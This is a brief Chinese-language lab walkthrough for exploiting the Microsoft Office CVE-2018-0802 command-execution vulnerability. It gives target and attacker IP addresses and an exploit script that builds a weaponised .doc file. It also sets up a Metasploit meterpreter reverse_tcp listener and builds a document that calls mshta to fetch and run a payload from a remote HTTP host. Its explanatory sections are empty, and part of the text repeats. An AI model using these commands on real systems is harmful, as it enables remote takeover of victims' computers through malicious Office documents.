Microsoft Office命令执行漏洞
CVE-2018-0802
【原理】
【工具】
【步骤】
win7 ip :172.28.168.194
kali ip: 172.28.168.195cd Documents/RTF_11882_0802 //进入exp文件夹
python RTF_11882_0802.py -c "cmd.exe /c calc.exe" -o calc.doc //生成测试文件









最后更新于
CVE-2018-0802
win7 ip :172.28.168.194
kali ip: 172.28.168.195cd Documents/RTF_11882_0802 //进入exp文件夹
python RTF_11882_0802.py -c "cmd.exe /c calc.exe" -o calc.doc //生成测试文件









最后更新于
mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/use exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
show options
set lhost 172.28.168.195 //kali的ip
set LPORT 4444
set uripath 123
exploitpython RTF_11882_0802.py -c "mshta http://192.168.119.129:8080/235" -o new.doc